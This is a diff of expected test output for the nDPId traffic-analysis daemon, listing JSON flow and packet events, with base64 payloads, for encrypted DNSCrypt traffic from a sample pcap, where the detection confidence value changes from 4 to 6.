+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739660371,"flow_last_seen":946739660371,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739660371,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01240{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":946739660371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739660371,"pkt":"REREREREZmZmZmZmCABFAAJc6wNAAK8R\/JUKAAABwx5eHJ\/+IPsCSORQeRS+sjS2G7nK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDAyVmLtuOyOPrdbG9Aa84c6ABESOcWKO1lD0bmXASu6Lp1JrrhdSsrfi+qCLd+yV08wcBIOyOD3xWu+JqcvR+qyyD2wAqK+7GtNLfa5CYKvl4+qE+B8Fdcg3etmdvWho9v6RWRGqvWQ79X3lh7drodQ5tDBKL+haa6jK+KUocn+9wX11hwHxQkGR1McxgwheyWwiQ8yk86\/0X3FOuLzu\/q11WpJtGw+xpq\/OB+8OUVOD89R6Mnj\/UOcx7obvr0eYbF5A8onkaQEbT7AaiYRJQ+hA7ZZDi2ljxg+uDg1AUnD5AkpxvEvbz9buRkBehRmtAjmpjCb+1eSSGGy0pj3fWliJpufCy0cLqKeBAa8pN+PboX7ibcQKD2oLVDzOMCPNysRr7U4iSHLRzA3mGLlWv1wmtPqVLl\/EoRbf02Q+FQ\/4r6mOaMPxUziXWn4x9EAZfWAyRDD7Afeh1n3Kmrb8xH0TDb8AwH7WhW4050ZoDY8fwOoRj\/\/yicxCkUFPRn2\/1wmsWfaim9o7xstoH1TFkuOYolb5zL0b\/s+Q6LzmCI0CRhGzcGbTPbKaxkq5YwwG9Y4Y7yX3r23bemnved9GKHI+BB80yEb94yRK1wmhzXgZyDB626hQAGMFgeYF1jYBg8XUeiAWAkUeVdpaFQcCYu3RciaRBtQKGADb1WYqE\/SeWtKsrZLM+n2BJmC8O6wwHCEtXzUPi0rg"} 00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":946739660417,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":946739660417,"pkt":"ZmZmZmZmRERERERECABFAAGcN+1AADgRJ23DHl4cCgAAASD7n\/4BiHhncjZmbnZXajgMlZi7bjsjj63WxvRslmVw4ADDYw9Zf7rvWXePF7DzWlPhjWqgv8O9se2dHg\/hMkwpzbF\/IwWGmMmxEowkpKXdmkUibqvznKVpkcwGgbuuCaS7Y6VBAIjGo9kWj7NiKTrA6Y4suMJM1qQ00IXt9U3jt4cutk2V8vfwhRYcaNOhsYhZrStljarNU+tA0k9iIXbco1x+a3RzKSkOB\/31hiwlYARdPxVfA4tlw7PDeRv6xT+b+Zv+a+jVuxZiNAikFvbCic9wNteLeIi7n5SfaDU1hH5H0TBuxqIVG9IHOsQSrBqKpNMeo1qfha7yS2X+OJjDupJOcyA3aK4UBMnSr\/hwPHcnofH4+5e3N9vB71o19Y0N1Cu3OIZZTlMMscwt3XDJIpsNrPW0k\/KXOVig1xeZdDezEjIt7JmJY9nlO847+Hb404Ny9pRCt57zdrjCVnAEbkkF4phZwF7K\/zzTOwqW\/8CPNUPEe\/A1vTBCVo6HwXAA4OkIci3U"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739660417,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739660417,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739719617,"flow_last_seen":946739719617,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":946739719617,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739719617,"pkt":"REREREREZmZmZmZmCABFAAJc7JNAALYR9AUKAAABwx5eHOmkIPsCSORQeRS+sjS2G7nK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDBMo9soY0c0\/zLwoUlxND\/bzQvpDiK25XnQMxT75lxBrJflDrZ3TYKCZk3StXCyTPG2FEGcG4hxHWTOmqcbZoIHiQGoGkoQihxo2BUKPI0pv0p51t1V26edh28hXvxxPPw7SntT7cr75g96KEBOTmpz8vKr2JtKP2b7u7k2V1lEcb4dyw8IiZpBWjdyNCmd3NDqhxitoMAdVDWaaN+p4NUnsh5LOnpcy+BudMvUiIPxrci+i2KL44M4RFazBU2s57RNqiqEv2bkqUCThU0SgEc9wzNR0FW71ZK4hudAWH8M3\/hAXcN9AewD\/AaJXRVgDGL0qn\/KRenrwTdCnxi6HDTa7amK+XsctsA25HOCRbRxeQJwScz6KcVEdK2TbQ7TCqCmGiDFCvYDXyDQlbjKYXmp0\/BJYjaZCnwrJp12tBAZ0x6OjhYZwAWscu0uhjPmD9iVirzPedIzLRyxaMWlLGePyHaAj4Or7sxUvict7D7E89\/0BkN8XtgG7lgmFT7zBoSzurlQ88vZsCNnKrFOvXYxZt2fBsVODLujNj\/tDQxfHRhSVCSuXN1WgXvmx8\/4SpEwOdjJ8GjGun7mZ2UfbnIj9QtUtWtJKU6mASD9XU0UWic8hmr4RcPHxhUnHJGAJ046xlUlER7NkMJm1TYibdKqask11nfPMpD0VjWYxoY7AOCRP0FnM2aYF37QqRyAsLBiMZsWdVVPm"} 01029{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":946739719664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":946739719664,"pkt":"ZmZmZmZmRERERERECABFAAG+RWVAADgRGdPDHl4cCgAAASD76aQBqqggcjZmbnZXajgTKPbKGNHNP8y8KFKW+XSruqbViU5UWiUSva7p4q\/AYRczDRsV3nci5xVTY3W7NmNbgWd95Wn1LHJZkVPpqTVw1qBPY5mArBhf+gRPUeOFfECdd+ofJDaoGOvOFyamxhIyROMRMgW5dPvOthc+oP4fRsaTLVk1jsGJhVCC8lL5C7WuKe4QsVCug6vlUb5MDgOey6PWAfheq6uh\/Wb6o6xCo9SsCbwnrsE4\/c3AnoD6VGu4z3OHcZv3Of85CH1fdBZtiEXJ14iGDgR0ySBqfwkfNqV\/amN09mhv37d8Bukwbh0NRB9ju6Oyp6QVJsBxuvpcLx3ia\/I19JcfBxIdSgYP2PNeqmV9aFF\/5i5eq\/gB2ziWHE3n4eWmdHy\/5HtzZoouaDQrjeTLDoGeRsyQ8AbAcbxTJeYc\/hyvjG0S4Dh4GFFMLk5QGrpOAQxsjlasHPCZNUlI6FaWbg9J6wj4UctB1m9PxGlOpLCTcjHtKT14QtT3C0e8B5m0\/g4kyAvL0ntLRf8vwUxpdglUbwcHEqyLa0eWST5dVlmaKw=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739719664,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739719664,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739720236,"flow_last_seen":946739720236,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739720236,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":946739720236,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739720236,"pkt":"REREREREZmZmZmZmCABFAAJcgJBAALYRD\/QKAAABMw8+QbCyAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDOvN3LKmlsKPJgnxHDgQO2HIwu\/7HgUbhvSQLUmgTButtVYZ7ynSLJeOyVR7apKprNCXG1CB6RzKxjyoWSQdDjHQSudtBqe8pb0jpoyikDKAP5jZsuhlLmSafeiWgv4b7FcEcaSLItWNKLNEkAAXUwpoLIVbFjTOnXrLtfp8ddH5RkIQz3yuUJ9Nr9mnfMn04Kowojf10wKowiddPU5KKVho7F0cvcKjFtvuttnCHTnagcxAyTEmIcCymyhGi+h9M4qiKb4nZlaO8w0zOAMAC1r78IGbvmw2MC\/y\/XFDrOtYAyDWcOnUil1BFM0d\/Bz+j1o\/P8xdWxuA8zW6LX70nyKPAmn2+XMm6v93oH0oPPpEb87KAvDSvCagsZZA4fpWnggw8IDtM+xGjIpanNsL2VG3CCZ8SJchr0dd0ybGZUr6\/QWXs1PQNuAQq7PtTY0h5VDncSKKbfMtAy3KYwk5hwtNLo5PMwSgkhumRRE888qSzJlQJGBNzGsf1NwJANZTAqrVJeK8b7f+2pTSgrru+nRtvffr5TCeW5qGtpkkXT1G87oaz4FH2RV1Xm1JIdrzicLRjoj866viGnjQ5b2\/UKZWoCT22+fKnqSPDxIXp73HamN35GQ751GknwXsyMVZZbtLrbqcV6TqrFj8sSTjExCJ80Zk2kq4s9KvTe8IudfZv2VZnKat7igdMc61peD9CbEijjtfZYoC"} 00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":946739720266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739720266,"pkt":"ZmZmZmZmRERERERECABFAAEM3XMAADURdWEzDz5BCgAAAQG7sLIA+HYgcjZmbnZXajjrzdyyppbCjyYJ8RwtW4RTIlvIG\/FZbH1Xp2LSeUte4yLE0KEYJIy\/W8+x\/FH3nQM381uStJPi54eYTbEiFOHb6+tNj6JfFejP8ANh9SW7+XztIQKHTMkKaKwDijmfQK3jWMvzYn5RQLy\/kgEd3jZcHSQ4+mGlJFAq0q9\/sxSmeRSE7Bf4lfghgGePrvRax2LVMOPyLQdEzOtXRcimFhC\/P2NV+z\/yC5UUyjWbNHflc5ZhEb6wjqEIWWaXMR9PmHFkJmX18vLk2mHCcaPJ0ISTpxtaV1D5IuKPIa2LIoH3gyFLk8kBlxy8"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739720266,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739720266,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739725845,"flow_last_seen":946739725845,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739725845,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":946739725845,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739725845,"pkt":"REREREREZmZmZmZmCABFAAJcg7xAALYRDMgKAAABMw8+QY+KAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDHgMkBVee38D+I7fnhBktgHf7os968\/qL0XkoqwhIpo2rKPzGWXe2G9NgFMScZ1tv4\/+yOWKKWYUUiUyLx+7PMrENy\/k+jN+yzdctk2Zo3FLcHvC79XH2TY1F0O7cJD1wjxZI3\/IHMcd6PNvU2hGrzF+GquS0c6mjapr0bbntYIeD4+Xf\/ITOco5AtKhdlLVR6qs44J9FD4+1MhlzKeOoRa6oiskDhR9SKCiLE0vY6WaFISx1KvaV1\/AWlTq+Ma\/RCIZcpIwRnCK5x9qtU8svtd3XmYK5sxwzMlT8VpdCDkudem2VmnpOeldtwd4GZeCkcdGXhDpTvkco7\/J7KzU8Em3dvt1ZFDy4TcFUOFTvtGhCNRYamvuZtqV1ariMFQakPC5kVsCG2gSYSztnSwq2hbNURFeBG0BsgQjYyNkq5wGuYsXMV6s23vt0COGB4x1t6Zn8jjY5lWn7t84BUSUEjxNSXlazc9hfUsGYBk1YNyvKVIOa4XVjl\/NR0vRtizEXbk8CW7UFlpZywbOaEBbweblLU4zywJ5qKZiL8sEsu9XT1G3qBmTW8cVYrUgsGb+gfIiskkKUwoOtt9RL+Teq82rqtdl6NJyjfa8lJ6hpSkFQGXkbcjp3VueVgKLzTUvGcLRMTp0C18n\/FNAt4vg0zRX0o3Lss4rXcLQ3ZMQHCelaCESW7C4sZpRGMwGTOa2B2AzD+kO+ZGd"} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":946739725874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739725874,"pkt":"ZmZmZmZmRERERERECABFAAEM4eEAADURcPMzDz5BCgAAAQG7j4oA+L7VcjZmbnZXajh4DJAVXnt\/A\/iO355MVB4P\/\/Rk8\/R8bJwvIdLtYy13W15OTi+Go1C5ARLPQjyVOYrIdtt78KeJtxqvLGMYFgf90WzBjkKY8vjgNB0MPV1q9fSbDPwYJMt9sDZnnX7J06DitoJz19fiGevmNqdw2iS+W0+hbeSiK8kirJT\/QpPdxVHp2xD743rTjnXejSHner\/lxnNhKbPdOrwzbBbFmJ\/STzN7we3lc\/L7tRfFce0lf4Dadw+FNCaY6kAAQ713YJ6hg1mApwixRpXpT16U0DoxmV6YKXf9KevXwY7CFTGcq9MsTSP1FQYE"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739725874,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739725874,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739727013,"flow_last_seen":946739727013,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739727013,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 